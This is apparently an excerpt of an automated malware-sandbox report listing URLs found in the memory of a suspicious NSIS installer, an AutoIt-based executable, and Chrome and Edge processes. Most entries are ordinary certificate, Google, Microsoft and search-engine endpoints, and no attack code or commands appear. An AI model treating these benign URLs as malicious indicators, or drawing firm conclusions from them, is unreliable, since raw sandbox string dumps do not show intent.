            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
            Source: nB52P46OJD.exeString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
            Source: chrome.exe, 00000011.00000003.2018572062.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018679546.00006C780107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018760052.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018854218.00006C7801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
            Source: nB52P46OJD.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: nB52P46OJD.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: chrome.exe, 00000011.00000003.2019573271.00006C7801170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019158969.00006C7800700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018572062.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019519827.00006C78003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018679546.00006C780107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019375269.00006C780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019324643.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018760052.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019098163.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018724142.00006C78010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018854218.00006C7801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
            Source: chrome.exe, 00000011.00000003.2019573271.00006C7801170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019158969.00006C7800700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018572062.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019519827.00006C78003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018679546.00006C780107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019375269.00006C780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019324643.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018760052.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019098163.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018724142.00006C78010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018854218.00006C7801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
            Source: chrome.exe, 00000011.00000003.2019573271.00006C7801170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019158969.00006C7800700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018572062.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019519827.00006C78003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018679546.00006C780107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019375269.00006C780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019324643.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018760052.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019098163.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018724142.00006C78010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018854218.00006C7801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
            Source: chrome.exe, 00000011.00000003.2019573271.00006C7801170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019158969.00006C7800700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018572062.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019519827.00006C78003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018679546.00006C780107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019375269.00006C780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019324643.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018760052.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019098163.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018724142.00006C78010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018854218.00006C7801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
            Source: chrome.exe, 00000011.00000003.2036975276.00006C7800EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: Participating.com, 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp, Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: chrome.exe, 00000011.00000003.2036975276.00006C7800EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/update2/response
            Source: Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, DBAI5P.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
            Source: chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054590983.00006C7802C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054216422.00006C7802CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054114288.00006C7802CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054171670.00006C7802CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msedge.exe, 00000015.00000003.2158586985.0000022AEB172000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2188099617.0000022AEB172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://assets.msn.cn/resolver/
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://assets.msn.com/resolver/
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://bit.ly/wb-precache
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://browser.events.data.msn.cn/
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://browser.events.data.msn.com/
            Source: Reporting and NEL.24.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://c.msn.com/
            Source: Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, DBAI5P.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: service_worker_bin_prod.js.23.dr, offscreendocument_main.js.23.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
            Source: chrome.exe, 00000011.00000003.2046077675.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019497736.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2031692934.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007829951.00006C7800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
            Source: chrome.exe, 00000011.00000003.2046077675.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019497736.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2031692934.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007829951.00006C7800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chrome.exe, 00000011.00000003.2030954255.00006C7800C70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2197308191.000047B80017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
            Source: manifest.json.23.drString found in binary or memory: https://chrome.google.com/webstore/
            Source: chrome.exe, 00000011.00000003.2009605110.00006C7800C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2012516737.00006C780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2020378697.00006C7800E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019708088.00006C780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2012045671.00006C7800E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007757048.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009388296.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2030954255.00006C7800C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000517489.0000474C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2048687585.0000474C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000647191.0000474C00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000517489.0000474C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2048687585.0000474C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000647191.0000474C00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2051212256.00006C7802660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000517489.0000474C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2048687585.0000474C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000647191.0000474C00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
            Source: msedge.exe, 00000015.00000002.2197308191.000047B80017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.23.drString found in binary or memory: https://chromewebstore.google.com/
            Source: msedge.exe, 00000015.00000002.2197308191.000047B80017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/https://chrome.google.com/webstoreG
            Source: chrome.exe, 00000011.00000003.1996744063.000012F8002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996723267.000012F8002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
            Source: chrome.exe, 00000011.00000003.2007829951.00006C7800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2191150669.000047B800040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://clients2.google.com/service/update2/crx
            Source: chrome.exe, 00000011.00000003.2046077675.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxlx
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: Reporting and NEL.24.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://docs.google.com/
            Source: chrome.exe, 00000011.00000003.2036236532.00006C7801634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-autopush.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-0.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-1.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-2.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-3.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-4.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-5.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-6.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-preprod.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-staging.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive.google.com/
            Source: chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 000003.log1.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
            Source: 000003.log1.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
            Source: 000003.log2.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
